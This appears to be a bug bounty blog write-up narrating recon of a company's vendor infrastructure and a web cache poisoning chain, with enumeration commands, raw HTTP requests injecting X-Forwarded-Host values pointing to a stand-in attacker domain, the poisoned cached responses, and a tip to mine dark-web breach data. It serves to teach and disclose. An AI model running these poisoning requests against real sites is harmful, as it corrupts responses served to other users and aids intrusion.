Hey there!๐Ÿ˜

From Third-Party Recon to Cache Poisoning Chaos โ€” A Bug Bounty Story That Went Way Too Far ๐Ÿ˜ตโ€๐Ÿ’ซ๐Ÿ’ป

"You know adulthood is getting serious when your food delivery app knows your address better than your relativesโ€ฆ and somehow a random vendor subdomain knows even more." ๐Ÿ”๐Ÿ“ฆ

I was supposed to be sleeping.

Instead, at 2:17 AM, I was staring at a forgotten vendor portal, three cups of cold coffee deep into recon, wondering why a JavaScript file was exposing internal AWS bucket names like it was handing out festival flyers.

That was the exact moment this bug bounty hunt stopped being "just another recon session" and turned into one of the craziest supply-chain intelligence rabbit holes I've ever followed. ๐Ÿ•ณ๏ธ๐Ÿ‡

Introduction: The Day I Stopped Looking at the Main Domain ๐Ÿ‘€

Most hunters focus only on the main application.

Big mistake.

Modern companies are giant LEGO structures made from:

  • third-party vendors
  • analytics providers
  • CRM tools
  • support dashboards
  • marketing platforms
  • CI/CD pipelines
  • CDN integrations
  • outsourced development portals
  • forgotten staging assets

And sometimesโ€ฆ

The weakest link isn't the company itself.

It's the vendor they forgot existed.

That's exactly what happened here.

What started as a simple recon session eventually exposed:

  • Internal vendor infrastructure
  • Leaked configuration files
  • Sensitive API routes
  • CDN behavior issues
  • Advanced web cache poisoning
  • Internal debug headers
  • Cross-environment asset reuse
  • Employee email patterns
  • Hidden authentication flows
  • Cloud storage references

โ€ฆand eventually revealed the real target hiding behind the public application.

This write-up covers the full story, the methodology, the payloads, the recon workflow, and the exact thought process behind chaining low-signal findings into a high-impact report. ๐Ÿ”ฅ

Phase 1 โ€” Starting with Passive Recon ๐Ÿ›ฐ๏ธ

Like every unhealthy bug bounty obsession, this started with recon.

But instead of attacking the primary application immediately, I focused on external intelligence.

The target company had:

  • multiple acquisitions
  • several vendor integrations
  • outsourced infrastructure
  • regional support systems
  • marketing automation providers

Which meant one thing:

Supply-chain exposure potential.

So I started collecting assets.

Subdomain Enumeration

subfinder -d target.com -silent | tee subs.txt
amass enum -passive -d target.com >> subs.txt
assetfinder --subs-only target.com >> subs.txt
sort -u subs.txt -o subs.txt

Then:

httpx -l subs.txt -tech-detect -title -status-code -follow-redirects

That immediately exposed weird hosts like:

vendor-assets.target.com
cdn-partner.target.com
support-sync.target.com
legacy-api.target.com
uat-marketing.target.com

Classic goldmine energy. โ˜•

Phase 2 โ€” Following Third-Party Intelligence ๐Ÿ”

Most people stop at subdomains.

I started pivoting externally.

Hunting Vendor References in JavaScript

I dumped JavaScript files:

katana -u https://target.com -jc -kf all -silent | tee js.txt

Then extracted juicy content:

cat js.txt | grep -Ei "api|vendor|staging|token|auth|cdn|s3|internal"

That's when I noticed something interesting:

https://sync.vendor-cdn.net/internal-assets/

Internal-assets?

That name alone felt illegal. ๐Ÿ˜‚

So naturallyโ€ฆ I kept digging.

Phase 3 โ€” CDN Fingerprinting & Hidden Behaviors ๐ŸŒ

The vendor asset endpoint behaved strangely.

Different headers. Different cache responses. Different status handling.

So I fingerprinted the CDN behavior.

Header Analysis

curl -I https://vendor-assets.target.com

Interesting response:

X-Cache: HIT
Via: vendor-edge
X-Served-By: cache-xyz

Now things were getting fun.

I started testing:

  • cache normalization
  • host header behavior
  • reflected headers
  • unkeyed query handling
  • path confusion
  • encoded path traversal
  • internal rewrite behavior

Because modern cache poisoning is rarely about:

?test=evil

Real-world cache poisoning today often involves:

  • secondary key confusion
  • origin rewrite mismatches
  • normalization gaps
  • header parsing inconsistencies
  • internal proxy desync
  • CDN/origin disagreement

That's where the real bugs live.

Phase 4 โ€” The Weird Header That Changed Everything ๐Ÿง 

While replaying requests in Burp Repeater, I noticed something strange.

Adding a crafted forwarding header changed the backend response.

Initial Test

GET /static/app.js HTTP/1.1
Host: vendor-assets.target.com
X-Forwarded-Host: internal.target.local

Response:

X-Cache: MISS

Second request:

X-Cache: HIT

Interesting.

Very interesting.

The CDN was caching a response influenced by a forwarded header.

That meant:

  • header influence existed
  • cache key inconsistency existed
  • origin trust behavior existed

Now it was time to escalate.

Phase 5 โ€” Advanced Cache Poisoning Recon โ˜ฃ๏ธ

At this point, I moved into Burp Suite.

Tools used:

  • Repeater
  • Comparer
  • Logger++
  • Param Miner
  • Turbo Intruder
  • Collaborator

Param Miner Discovery

Param Miner discovered hidden input handling:

X-Rewrite-URL
X-Original-URL
X-Forwarded-Host
X-Host
Forwarded

That usually means reverse proxies are involved.

Which usually means danger. ๐Ÿ˜ˆ

Phase 6 โ€” Cache Key Confusion ๐Ÿงฉ

The vulnerable behavior happened because:

  • The origin server trusted X-Forwarded-Host
  • The CDN cache key ignored it
  • The generated response reflected it

This caused poisoned responses to be cached globally.

Proof-of-Concept

GET /assets/main.css HTTP/1.1
Host: vendor-assets.target.com
X-Forwarded-Host: attacker-controlled-domain.example

The response contained:

<link rel="preload" href="https://attacker-controlled-domain.example/fonts/main.woff2">

And the response was cached.

Meaning every future user requesting that asset inherited poisoned references.

That alone was impactful.

But the real issue was deeper.

Phase 7 โ€” Internal Debug Routes Exposed ๐Ÿšจ

While fuzzing vendor paths:

ffuf -u https://vendor-assets.target.com/FUZZ -w raft-medium-directories.txt -fc 404

I discovered:

/debug
/internal
/assets-preview
/cache-status

The /cache-status endpoint leaked:

{
  "origin": "uat-storage.internal.vendor.local",
  "environment": "staging",
  "bucket": "vendor-uat-assets"
}

That was the turning point.

Because now:

  • internal infrastructure naming was exposed
  • staging environments were identified
  • cloud bucket patterns were visible
  • trust boundaries were collapsing

This wasn't just cache poisoning anymore.

This was infrastructure intelligence leakage.

Phase 8 โ€” The Supply Chain Pivot ๐Ÿ”—

Now I started pivoting through third-party exposure.

Searching Historical Data

I checked:

  • Common Crawl
  • Wayback Machine
  • old JS snapshots
  • GitHub commits
  • leaked config patterns
  • public package references

One old JavaScript snapshot exposed:

api.sync-vendor.net/v2/internal/export

That endpoint returned:

{
  "environment":"production",
  "region":"ap-south-1"
}

Not critical alone.

But combined with:

  • vendor intelligence
  • cache poisoning
  • internal bucket names
  • leaked environment references

โ€ฆit painted the full architecture map.

Phase 9 โ€” Dark Web Intelligence & Breach Correlation ๐Ÿ•ถ๏ธ๐Ÿ’€

Here's something most people ignore:

Dark web intelligence matters in recon.

A LOT.

Not because Hollywood hackers are typing green text in hoodies.

But because breached vendor data frequently exposes:

  • employee naming conventions
  • authentication portals
  • old credentials
  • VPN references
  • infrastructure screenshots
  • internal domains
  • Jira URLs
  • Okta identifiers
  • CDN provider details

During this engagement, I correlated vendor information with older breach discussions floating around underground forums.

One dataset referenced:

vendor-support-sync

The exact same naming convention appeared in:

support-sync.target.com

Now I knew:

  • the vendor relationship was real
  • infrastructure naming was reused
  • environment segmentation was weak

And this explained why the cache architecture behaved inconsistently across environments.

This is why breach intelligence matters.

Attackers already correlate this stuff.

Bug bounty hunters should too.

Phase 10 โ€” Burp Suite Became My Best Friend ๐Ÿงƒ

At this stage, Burp Suite looked less like a testing tool and more like a crime investigation board.

Every tab had:

  • weird headers
  • poisoned responses
  • staging routes
  • internal references
  • cache mismatches

Interesting Response Behavior

A crafted request:

GET /api/config HTTP/1.1
Host: vendor-assets.target.com
X-Forwarded-Host: cache-test.example

Returned:

{
  "assetHost":"https://cache-test.example"
}

And because the response was cacheable:

Cache-Control: public,max-age=600

โ€ฆthe poisoned JSON persisted for other users.

This could:

  • alter frontend asset loading
  • redirect dynamic resources
  • influence API consumers
  • expose sensitive logic
  • poison client-side configurations

This was no longer a "low severity cache issue."

This was a real-world supply-chain risk.

Phase 11 โ€” Chaining the Impact ๐Ÿ’ฅ

Here's the thing about advanced bug bounty reports:

Single bugs rarely impress.

Chains do.

The final report combined:

VulnerabilityImpactVendor intelligence leakageInternal infrastructure exposureCDN cache poisoningShared poisoned responsesUnkeyed header handlingCross-user manipulationDebug endpoint exposureEnvironment disclosureThird-party asset trustSupply-chain abuse riskInternal naming leaksRecon acceleration

This transformed multiple "mediums" into one high-impact narrative.

And that's how modern bug bounty hunting works.

You don't hunt isolated bugs anymore.

You hunt ecosystems.

None
GIF

Reporting the Vulnerability ๐Ÿ“ฉ

The report focused heavily on:

  • business impact
  • realistic abuse paths
  • supply-chain trust implications
  • poisoned client responses
  • cross-user exposure risk
  • third-party architecture weaknesses

Instead of screaming:

OMG CACHE POISONING!!!

โ€ฆI demonstrated:

  • how the vendor relationship amplified risk
  • how internal trust assumptions failed
  • how attackers could pivot through infrastructure leakage
  • how poisoned cache objects could affect downstream applications

That's what made the report stand out.

Lessons Learned ๐Ÿง 

1. Vendors Are Part of the Attack Surface

Companies secure the front door.

Attackers check the delivery entrance.

2. Recon Wins More Bounties Than Exploitation

Fancy exploitation means nothing without:

  • context
  • intelligence
  • architecture understanding
  • pattern correlation

Recon is king. ๐Ÿ‘‘

Practical Recon Tips for Hunters ๐ŸŽฏ

Hunt for Vendor Clues in:

  • JavaScript comments
  • source maps
  • old assets
  • archived snapshots
  • CSP headers
  • email MX records
  • CDN CNAMEs
  • analytics scripts
  • support widgets

Test Cache Behavior Using:

  • X-Forwarded-Host
  • X-Original-URL
  • Forwarded
  • path normalization
  • encoded slashes
  • mixed casing
  • duplicate headers
  • alternate host representations

Useful Tools

subfinder
amass
httpx
katana
ffuf
nuclei
Param Miner
Turbo Intruder
waymore

Final Thoughts โ˜•

This hunt reminded me of something important:

Sometimes the real target isn't the company.

It's the invisible web of vendors, CDNs, integrations, and forgotten infrastructure surrounding it.

And once you start following those connectionsโ€ฆ

You stop seeing applications.

You start seeing ecosystems.

That's where the best bug bounty stories begin. ๐Ÿ”ฅ

Connect with Me!

  • Instagram: @rev_shinchan
  • Gmail: rev30102001@gmail.com

#EnnamPolVazhlkai๐Ÿ˜‡

#BugBounty, #CyberSecurity, #InfoSec, #Hacking, #WebSecurity, #CTF